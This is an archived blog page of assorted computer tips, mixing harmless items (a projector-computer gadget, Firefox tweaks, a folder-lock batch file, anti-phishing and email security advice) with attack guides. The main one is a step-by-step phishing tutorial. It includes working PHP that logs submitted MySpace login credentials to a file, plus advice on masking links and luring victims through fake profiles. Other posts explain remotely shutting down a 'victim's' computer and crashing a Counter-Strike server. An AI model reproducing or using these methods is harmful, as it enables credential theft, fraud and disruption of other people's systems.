Showing posts with label computer. Show all posts
Showing posts with label computer. Show all posts

Tuesday, 4 June 2013

Spider for Cloud Computing

Spider for Cloud Computing

The new Spider Computer by Swedish designer, Nikolaus Frank, gives the mobile computer user a smaller and lighter option for travel. This small device relies on a projected screen and laser keyboard to offer you a ready computer on the go. It relies totally on the “cloud” factor and even doubles up as awkward phone.

Its three legs can easily be folded out, allowing it to be placed on a flat surface. Storing all your data on the Cloud, it reduces the amount of electronics you need to take with you. Digital correction compensates for angular differences in projection versus surface.

Working prototype was made for technology, user studies and research. When you fold it up, it also works as a mobile phone . It can be carried in your pocket and brought anywhere.

Thursday, 11 October 2012

How to make Mozilla Firefox 30 times faster

                How to make Mozilla Firefox 30 times faster

1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.

Name it "nglayout.initialpaint.delay" and set its value to "0".

This value is the amount of time the browser waits before it acts on information it
recieves.

If you're using a broadband connection you'll load pages 2-30 times faster now.

How to make a phisher for a website


                      How to make a phisher for a website

1. Intro
There are couple of other phishing tutorials around here, but some people seem to
have problems understanding them. So I'll try to be as simple as possible, and if you
have problems understanding it, then you need to get some beginner level computer
knowledge first.
-This article was written for educational purpose only. I'm not responsible for any
illegal activity that you may commit.
2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the
username and the password to a file, or does whatever you want.
3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we
will make a phishing site for Myspace(the procedure is equivalent for most of the
sites). While not signed in myspace, open anyone's profile and click on his picture.
That will lead you to Myspace's login page that has the red box with"You Must Be
Logged-In to do That!" just above your login form. Now, click File>Save Page As, and
save the myspace page to your Desktop. Open your saved page with any text
editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source
code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the
same function as if it were on the original site. The link to your phish site will be
'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and
press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging
them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in
button, search button, etc.). We need to find the 'action=some link' that refers to
the Login button.
After some searching, we find the:
<h5 class="heading">
            Member Login
        </h5>
        <form action="http://secure.myspace.com/index.cfm?
fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYW
NrS2V5X18WAgUwY3RsMDAkT
WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGw
wMCRNYWluJFNwbGFzaERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24="
/>
</div>
and we know that 'action="http://secure.myspace.com/index.cfm?
fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the
'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in
password boxes, and execute the functions in the 'login.php' file on your site(which
doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code
in it:
<?php
header ('Location: http://myspace.com ');
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passes.txt'(and creates it
if it doesn't already exist) and enter the informations there(the username and
password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and
passes.txt. but the .php and .txt must stay the same.
4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin, and sending them some
report with a link to log in the site(your phish site). Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing
this:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]
For example, www.google.com looks like a google, but it leads you to yahoo when you
click it.
If you're making the phisher for myspace, and want to get random ppl to it, you can
simply make some hot chick account and put some hot pic that will lead to your phish
site when clicked. So when they click the lusty image, they will be led to your phish
site telling them they need to log in to see that.
Like this:
[url=YourPhishSiteLink][img]link of the image[/img][/url]
When sending emails see for the option 'hyperlink', and it's self explainable once you
see it.
There are many other ways, and as I said, your creativity is the limit.
5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a
phisher, and how it works. Although is written for Myspace, the procedure is
equivalent for almost every other login site(for hotmail is different). After this, it's
up to you to explore, experiment and dive in the world of social engineering.

-: Folder Lock Without Any Software :-

   
                 -: Folder Lock Without Any Software :-


Folder Lock With Password Without Any Software-

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock

the folder namely 'Locker'.

If you want to unlock your files,double click the batch file again and you would be prompted for
password.

Enter the password and enjoy access to the folder.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

How to kick someone of a wireless network


                 How to kick someone of a wireless network


Step 1: Open cmd.

Step 2: Write shutdown -i

Step 3: Choose a Victim from the list

Step 4: Choose to shutdown their computer

Step 5: Make the warning pop up 1 sec before shutting down.

Step 6: Click Ok.

Done! :)

How To Kick Everyone From A Counter Strike Source Server


 How To Kick Everyone From A Counter Strike Source Server


INSTRUCTIONS:

1. Place Buffer1.cfg and Buffer2.cfg in your cfg folder. If it doesn't exist, make it
(see below)

(Commonly C:\User\program files\steam\steamapps\Account name\counter-strike
source\cstrike\cfg)
er

2. Go in game, open the developer's console, and type in the following (you may change
bind key):

Bind M "wait;exec Buffer1;exec Buffer2"

(If developer's console doesn't open, go to options, keyboard, advanced, enable
developer's console)

3. Go in game and rapidly hit the M key to crash the server. Depending on how fast
you hit it, it should

take anywhere from 15-30 seconds to crash. Don't stop hitting the key until you get a
message:

"Client # has overflowed reliable channel."

Or check:           G:\X-file\Stuff\Buffer Overflow.rar

How to hide files in a jpg


                             How to hide files in a jpg

Set up:

1. Must have a .zip or .rar compressor.

2. Willingness to learn.
Steps:

1. Save the picture of choice to your desktop.

2. Make a new .rar or .zip folder on your desktop.

3. Add the files you want to hide into the .zip or .rar

4. Click start menu, run, cmd.

5. In Command Prompt type cd "desktop" with the quotation marks.

6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg

( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)

7. Now there should be the outputed file name with a .jpg extension on the desktop.

( Do not close Command Prompt just yet )

8. Double click it to open the picture and check it out.

9. When your done looking, and want to view the hidden files

Type: ren outputfilename.jpg outputfilename.rar  or zip

Now you're done!

A quick info-fact:

With this technique of hiding files in a jpg you can send this to anyone and they just
have to rename the file extension to .zip or .rar.

With this technique the Al-Qaeda operatives were able to send info to others
secretively.

Thursday, 17 May 2012


Messages asking for personal information !!

Spam comes in a variety of forms, including fraudulent messages. This mass-messaging is called 'spoofing' or 'password phishing.'
Such fraudulent practices involve messages that appear to be from a legitimate source, or the creation of an official-looking webpage that asks you to provide your username and password or other personal information. Such messages or pages could ask for your Social Security number, bank account number, PIN number, credit card number, mother's maiden name, or birthday.

Spammers often ask for this information in an attempt to steal your Gmail account, your money, your credit, or your identity.

Google is currently testing a service designed to alert Gmail users to messages that appear to be phishing attacks. When the Gmail Team becomes aware of such an attack, the details of these messages are used to automatically identify future suspected phishing attacks.

The result: when a Gmail user opens a suspected phishing message, Gmail displays a warning.

Gmail's phishing alerts operate automatically, much like spam filtering. Gmail's spam filters automatically divert messages that are suspected of being unwanted messages into 'Spam'. Similarly, Gmail's phishing alerts automatically display warnings with messages that are suspected of being phishing attacks so that users know to take care before providing any personal information.

You should always be wary of any message that asks for your personal information, or messages that refer you to a webpage asking for personal information. If you receive this type of message, especially from a source claiming to be Google or Gmail, please do not provide the information requested.

Here's what you can do to protect yourself and stop fraudsters:

◘ Make sure the URL domain on the given page is correct, and click on any images and links to verify that you are directed to proper pages within the site. For example, the Gmail URL is http://mail.google.com/ or, for even more security, https://mail.google.com/. Although some links may appear to contain 'gmail.com,' you may be redirected to another site after entering such addresses into your browser.

◘ Always look for the closed lock icon in the status bar at the bottom of your browser window whenever you enter any private information, including your password.
Check the message headers. The 'From:' field is easily manipulated to show a false sender name.

◘ If you're still uncertain, contact the organization from which the message appears to be sent. Don't use the reply address in the message, since it can be forged. Instead, visit the official website of the company in question, and find a different contact address.

◘ If you enter your account or personal information as the result of a spoof or phishing message, take action quickly. Send a copy of the message header and the entire text of the message to the Federal Trade Commission at spam@uce.gov. If you entered credit card or bank account numbers, contact your financial institution. If you think you may be the victim of identity theft, contact your local police.

◘ Gmail\Yahoo\reiffmail doesn't send unsolicited mass messages asking for passwords or personal information.


Basic E-mail Tips

 !!There is a lot of information out there about securing your email. Much of it is advanced, and doesn’t apply to the typical end user. Configuring spam filters like SpamAssassin, setting up encrypted authentication on mail servers, and email gateway virus scannermanagement are not basic end-user tasks.

When one can find end user email security tips, they’re usually specific to a single mail client or mail user agent such as Microsoft Outlook, Mozilla Thunderbird, or Mutt. This sort of information is of critical importance to many users of these applications, but there are few sources of more general security information for email users that are not specific to a given client application.

The following is a short list of some important security tips that apply to all email users — not just users of a specific application. They are listed in the order one should employ them, from the first priority to the last. This priority is affected not only by how important a given tip is, but also by how easy it is to employ, because the easier something is to do the more likely one is to actually do it and move on to the next tip.

Tιρ 1.
Never allow an email client to fully render HTML or XHTML emails without careful thought. At the absolute most, if you have a mail client like Microsoft Outlook or Mozilla Thunderbird that can render HTML emails, you should configure it to render only simplified HTML rather than rich HTML — or “Original HTML” as some clients label the option. Even better is to configure it to render only plain text. When rendering HTML, you run the risk of identifying yourself as a valid recipient of spam or getting successfully phished by some malicious security cracker or identity thief. My personal preference is, in fact, to use a mail user agent that is normally incapable of rendering HTML email at all, showing everything as plain text instead.


Tιρ 2.
If the privacy of your data is important to you, use a local POP3 or IMAP client to retrieve email. This means avoiding the use of Web based email services such as GMail, Hotmail, and Yahoo! Mail for email you wish to keep private for any reason. Even if your Webmail service provider’s policies seem sufficiently privacy-oriented to you, that doesn’t mean that employees won’t occasionally break the rules. Some providers are accused of selling email addresses to spamming “partners”. Even supposedly security oriented Webmail services like Hushmail can often be less than diligent in providing security to their users’ email.


Tιρ 3.
It is always a good idea to ensure that your email authentication process is encrypted, even if the email itself is not. The reason for this is simple: you do not want some malicious security cracker “listening in” on your authentication session with the mail server. If someone does this, that person can then send emails as you, receive your email, and generally cause all kinds of problems for you (including spammers). Check with your ISP’s policies to determine whether authentication is encrypted, and even how it is encrypted (so you might be able to determine how trivial it is to crack theencryption scheme used).


Tιρ 4.
Digitally sign your emails. As long as you observe good security practices with email in general, it is highly unlikely that anyone else will ever have the opportunity to usurp your identity for purposes of email, but it is still a possibility. If you use an encryption tool like PGP or GnuPG to digitally sign your emails, though, recipients who have your public key will be able to determine that nobody could have sent the email in question without having access to your private key — and you should definitely have a private key that is well protected.


Tιρ 5.
If, for some reason, you absolutely positively must access an email account that does not authorize over an encrypted connection, never access that account from a public or otherwise unsecured network. Ever. Under any circumstances.
Be aware of both your virtual and physical surroundings when communicating via email. Be careful. Trust no one that you do not absolutely have to trust, and recognize the dangers and potential consequences of that trust.

Your email security does not just affect you; it affects others, as well, if your email account is compromised. Even if the email account itself is not compromised, your computer may be if you do not take reasonable care with how you deal with emails — and that, in turn, can lead to affecting both you and others adversely as well.

Don’t be a victim.